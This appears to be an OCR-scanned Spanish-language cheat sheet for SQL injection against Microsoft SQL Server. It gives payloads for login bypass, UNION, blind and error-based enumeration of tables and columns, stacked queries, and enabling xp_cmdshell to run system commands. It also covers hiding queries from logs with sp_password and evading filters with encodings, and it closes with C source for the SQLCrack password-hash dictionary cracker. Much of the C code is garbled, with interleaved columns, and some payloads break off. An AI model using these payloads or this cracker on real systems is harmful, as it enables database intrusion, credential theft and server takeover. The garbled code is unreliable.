

rortega

Base de datos por defecto

No disponible en SOL Server 2005 **sdu**q model Disponible en todas las versiones msdb Disponible en todas las versiones tempdb Disponible en todas las versiones northwind Disponible en todas las versiones

Disponible a partir de SQL Server 2000 y superior information_schema

Comentarios en las consultas

Se puede utilizar lo siguiente para comentar el resto de la consulta después de su inyección:

/* -> Comentario estilo C -- -> Comentario SOL ;%00 -> Nullbyte

Ejemplo:

SELECT * FROM usuarios WHERE usuario = " OR 1=1 -- AND contrasenna = "

SELECT * FROM usuarios WHERE id = "UNION SELECT 1, 2, 3/*"

Credenciales de la base de datos

BD.Tabla master..syslogins, master..sysprocesses

Campos name, loginame

Usuarios actual user, system_user, suser_sname(),

is_srvrolemember('sysadmin')

Credenciales BD SELECT user, password FROM master.dbo.sysxlogins

Ejemplo:

Devuelve el usuario actual:

SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID

Comprueba si el usuario es administrador:

SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1'

ELSE '0' END)

GO

Evitando el uso de comillas

SELECT * FROM usuarios WHERE usuario = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

Declaraciones condicionales

CASE

Eiemplos:

IF 1=1 SELECT 'true' ELSE SELECT 'false'

GO

SELECT CASE WHEN 1=1 THEN true ELSE false END

GO

Observación:

IF no puede utilizarse dentro de una sentencia SELECT.

Temporización

WAITFOR DELAY 'time to pass' WAITFOR TIME 'time to execute' GO

Ejemplo:

IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0'

GO

GO

Probando la versión

@@VERSION

Ejemplo:

Verdadero si la versión de SQL

Server es 2008.

SELECT * FROM Users

WHERE id = '1' AND @@VERSION

LIKE '%2008%'

GO

Observación:

La salida también contendrá la versión del sistema operativo Windows.

Nombres de bases de datos

BD.Tabla master..sysdatabases

Campo name

BD actual DB_NAME(i)

Ejemplos:

SELECT DB_NAME(5)

GO

SELECT name

FROM master..sysdatabases

Nombre del servidor

@@SERVERNAME

SERVERPROPERTY()

Ejemplos:

SELECT SERVERPROPERTY(

'productversion'),

SERVERPROPERTY('productlevel'),

SERVERPROPERTY('edition')

Observación:

SERVERPROPERTY() está disponible a partir de SQL Server 2005 y superior.

Concatenación de cadenas de texto

(SQL SERVER 2012)

SELECT CONCAT('a','a','a')

SELECT 'a'+'d'+'mi'+'n'

Ataques de **OPENROWSET**

SELECT * FROM OPENROWSET('SOLOLEDB', '127.0.0.1'; 'sa'; 'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"') GO





Tablas y columnas

Determinar el número de columnas

ORDER BY n+1

Ejemplo:

Dada la consulta:

SELECT usuario, contrasenna, permisos FROM usuarios WHERE id = '1'

1' ORDER BY 1-- Verdadero
1' ORDER BY 2-- Verdadero
1' ORDER BY 3-- Verdadero

1' ORDER BY 4-- Falso, La consulta sólo utiliza 3 columnas

-1' UNION SELECT 1,2,3-- Verdadero

Observación:

Seguir incrementando el número hasta que se obtenga una respuesta falsa.

Lo siguiente se puede utilizar para obtener las columnas de la consulta actual.

GROUP BY / HAVING

Ejemplo:

Dada la consulta:

SELECT usuario, contrasenna, permisos FROM usuarios WHERE id = '1'

1' HAVING 1=1-- Campo 'usuarios.usuario' no es válida en la lista de

selección porque no está contenida en una función

agregada ni en la cláusula GROUP BY.

1' GROUP BY usuario HAVING 1=1-- Campo 'usuarios.contrasenna' no es válida en la

lista de selección porque no está contenida en una función agregada ni en la cláusula GROUP BY.

1' GROUP BY usuario, contrasenna HAVING 1=1-- Campo 'usuarios.permisos' no es válida en la lista

de selección porque no está contenida en una función agregada ni en la cláusula GROUP BY.

1' GROUP BY usuario, contrasenna, permisos HAVING 1=1-- Sin error

Observación:

No se devolverá ningún error una vez que se hayan incluido todas las columnas.

Recuperación de las tablas

Podemos recuperar las tablas desde dos bases de datos diferentes, information_schema.tables o desde master..sysobjects.

Union

UNION SELECT name FROM master..sysobjects WHERE xtype='U'

Blind

AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

Erro

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))

Observación:

Xtype = 'U' es para tablas definidas por el usuario. Puede utilizar 'V' para las vistas.

Recuperación de las columnas

Podemos recuperar las columnas de dos bases de datos diferentes, information_schema.columns o masters..syscolumns.

Union

UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns

WHERE name = 'tablename')

Blind

AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'

Error

AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)

AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))





Tablas y columnas

Recuperación de varias tablas/columnas a la vez

Las siguientes 3 consultas crearán una tabla/columna temporal e insertarán en ella todas las tablas definidas por el usuario. A continuación, volcará el contenido de la tabla y terminará borrando la tabla.

Crear tabla/columna temporal e insertar datos:

AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END

Contenido del vertedero:

AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB)

Borrar tabla:

Y 1=0; DROP TABLE TMP DB

Existe un método más sencillo a partir de SQL Server 2005 y superiores. La función XML path() funciona como un concatenador, permitiendo la recuperación de todas las tablas con 1 consulta.

SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH(")

SOL Server 2005+

Observación:

Puedes codificar tu consulta en hexadecimal para "ofuscar" tu ataque.

'AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

Ejecución de comandos del sistema

Incluye un procedimiento almacenado extendido llamado xp_cmdshell que puede ser utilizado para ejecutar comandos del sistema operativo.

EXEC master.dbo.xp_cmdshell 'cmd'

A partir de la versión SQL Server 2005 y superiores, xp_cmdshell está desactivado por defecto, pero se puede activar con las siguientes consultas:

EXEC sp_configure 'show advanced options', 1

EXEC sp configure reconfigure

EXEC sp_configure 'xp_cmdshell', 1

EXEC sp_configure reconfigure

También puede crear su propio procedimiento para conseguir los mismos resultados:

DECLARE @execmd INT

EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT

EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

Si la versión de SQL Server es superior a la 2000, tendrá que realizar consultas adicionales para ejecutar el comando anterior:

EXEC sp configure 'show advanced options', 1

EXEC sp configure reconfigure

EXEC sp_configure 'OLE Automation Procedures', 1

EXEC sp_configure reconfigure

Ejemplo:

Comprueba si xp_cmdshell está cargado, si lo está, comprueba si está activo y entonces procede a ejecutar el comando 'dir' e inserta los resultados en TMP DB:

'IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a=" SELECT @a=Replace(@a%2B'

'brook' Select 'srook' Select 'sr

Contenido del vertedero:

'UNION SELECT tbl FROM TMP_DB--

Borrar tabla:

'DROP TABLE TMP_DB--





SP PASSWORD (Ocultar la consulta)

Si se añade sp password al final de la consulta, se ocultará de los registros T-SQL como medida de seguridad.

SP PASSWORD

Ejemplo:

'AND 1=1--sp_password

Salida:

- -- Se encontró 'sp_password' en el texto de este evento.
- -- El texto ha sido sustituido por este comentario por razones de seguridad.

Consultas apiladas

SQL Server admite las consultas apiladas. Ejemplo:

'AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');

Hashing de contraseñas

Las contraseñas comienzan con 0x0100, los primeros bytes que siguen al 0x son una constante; los siguientes ocho bytes son la sal del hash y los 80 bytes restantes son dos hashes, los primeros 40 bytes son un hash de la contraseña que distingue entre mayúsculas y minúsculas, mientras que los segundos 40 bytes son la versión en mayúsculas.

0x0100236A261CE12AB57BA22A7F44CE3B7 80E52098378B65852892EEE91C0784B911D 76BF4EB124550ACABDFD1457

Fuzzing y ofuscación

Carácteres intermedios permitidos

Los siguientes caracteres pueden utilizarse como espacios en blanco.

01	Inicio del encabezado
02	Inicio del texto
03	Fin del texto
0.4	Electric terror contact to

Fin de la transmisión 04

05 Consulta Acuse de recibo 06 07 Timbre 80 Retroceso

Tabulación horizontal 09

0A Nueva línea **0B** Tabulación vertical 0C Nueva página 0D Retorno de carro

Desplazamiento hacia fuera 0E 0F Cambio de entrada 10 Escape de enlace de datos Control de dispositivo 1 11 12 Control de dispositivo 2 13 Control de dispositivo 3 14 Control de dispositivo 4 15 Reconocimiento negativo 16 Sincronización en reposo Fin del bloque de transmisión 17

18 Cancelación Fin del medio 19 **1A** Sustitución **1B** Escape

1C Separador de archivos **1D** Separador de grupo 1E Separador de registros 1F Separador de unidades

20 **Espacio** 25

Ejemplos:

S%E%L%E%C%T%01column%02 FROM%03table A%%ND 1=%%%%%%%%%1

Observación:

Los signos de porcentaje entre las palabras clave sólo son posibles en las aplicaciones

También se pueden utilizar los siguientes caracteres para evitar el uso de espacios.

28 29 5B 5D

Ejemplos:

UNION(SELECT(column)FROM(table))

SELECT"table_name"

FROM[information_schema].[tables]

Caracteres intermedios permitidos después de AND/OR

Rango 21 2B 2D 2E 5C 7E

Ejemplo:

SELECT 1FROM[table]WHERE\1=\1AND\1=\1;

Observación:

La barra invertida no parece funcionar con SQL Server 2000.

Codificación

Codificación de URL

SELECT %74able_%6eame FROM information_schema.tables

Doble codificación de la URL

SELECT %2574able_%256eame FROM information_schema.tables

Codificación Unicode

SELECT %u0074able_%u6eame FROM information_schema.tables

Codificación hexadecimal inválida (ASP)

SELECT %tab%le %na%me FROM information schema.tables

Codificación hexadecimal

'AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--





Descifrado de contraseñas

SOLCrackCl

Descifrador de contraseñas de SOL Server 2000

Esta herramienta está diseñada para descifrar las contraseñas de Microsoft SQL Server 2000.

```
Esto realizará un ataque de diccionario contra el hash en mayúsculas para una contraseña. Una vez descubierto esto, pruebe todas las variantes de mayúsculas y minúsculas para la contraseña en mayúsculas y minúsculas.
                           Este código fue escrito por David Litchfield para demostrar como las contraseñas de Microsoft SQL Server 2000 las contraseñas pueden ser atacadas. Esto puede ser optimizado considerablemente al no utilizar la CryptoAPI.
                            (Compilar con VC++ y enlazar con advapi32.lib ¡Asegúrese de que el SDK de la plataforma también ha sido instalado!)
#include <stdio.h>
#include <windows.h>
#include <windrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
                                                                                                                                                                                                                                                                               if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL
                                                                                                                                                                                                                                                                                                 if(GetLastError()==NTE_BAD_KEYSET)
                                                                                                                                                                                                                                                                                                                          // KeySet does not exist. So create a new keyset if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET ))
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
              int err = 0;
if(argc !=3)
                                                                                                                                                                                                                                                                                                                                            printf("FAILLLLLL!!!");
return FALSE;
                                           printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
                                                                                                                                                                                                                                                                                                // get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uvttf,84);
// Convert the word to UNICODE
while(count < len)
              err = OpenPasswordFile(argv[2]);
if(err !=0)
                   return printf("\nThere was an error opening the password file %s\n",argv[2]);
               }
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
                                                                                                                                                                                                                                                                                                                              uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
count++;
cnt++;
 int OpenPasswordFile(char *pwdfile)
               fd = fopen(pwdfile,"r");
if(fd)
                                                                                                                                                                                                                                                                                             }
len --;
wp = kuwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt] = x;
cnt++;
t = key << 8;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt] = x;
cnt++;
t = key << 8;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt] = x;
cnt++;
               else
                            return 1:
 int CrackPassword(char *hash)
              char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char uwttf[100]="";
char wwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
              char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
                                                                                                                                                                                                                                                                                              t = key << 16;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
                                                                                                                                                                                                                                                                                               t = key << 24;
t = t >> 24;
                                                                                                                                                                                                                                                                              t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0, 0, &hHash))
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash)!=94)
                                                                                                                                                                                                                                                                                                             printf("Error %x during CryptCreatHash!\n", GetLastError()); return 0;
                             return printf("\nThe password hash is too short!\n");
if(hash[0]==0x30 \&\& (hash[1]== 'x' || hash[1] == 'X'))
                           ]==0x30 && (hash[1]== 'x' || hash[1] == hash = hash + 2; strncpy(pheader,hash,4); printf("\nHeader\t\t\: \%=\nheader); if(strlen(pheader)!=4) return printf("\s",lerr); hash = hash + 4; strncpy(pkey,hash,8); printf("\nRand key\t\: \%=\nheader); if(strlen(pkey)!=8) return printf("\s\=\nheader\t\); hash = hash + 4; strncpy(pnorm,hash,40); printf("\nNormal\t\t\: \%=\nnormal\t\\: \%=\nnormal\t\: \%=\nnormal\t\\: \%=\nnormal\t\: 
                                                                                                                                                                                                                                                                               if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
                                                                                                                                                                                                                                                                                                             printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
                                                                                                                                                                                                                                                                               \label{eq:crystate} $$ \operatorname{CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);} $$ // \operatorname{Test the first byte only. Much quicker.} $$ if(szhash[0] == cmp) $$
                                                                                                                                                                                                                                                                                                             // If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)</pre>
                                                                                                                                                                                                                                                                                                                               ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&cmp);
if(szhash[cnt]==cmp)
                                                                                                                                                                                                                                                                                                                                else
                                                                                                                                                                                                                                                                                                                                            break:
                                                                                                                                                                                                                                                                                                              if(cnt == 20)
                                                                                                                                                                                                                                                                                                                    // We've found the password printf("\nA MATCH!!! Password is %s\n",wttf);
                              return printf("The password hash has an invalid format!\n");
                                                                                                                                                                                                                                                                                                                     printi( \r
return 0;
printf("\n\n
                                         Trying...\n");
                                                                                                                                                                                                                                                                                                     count = 0;
```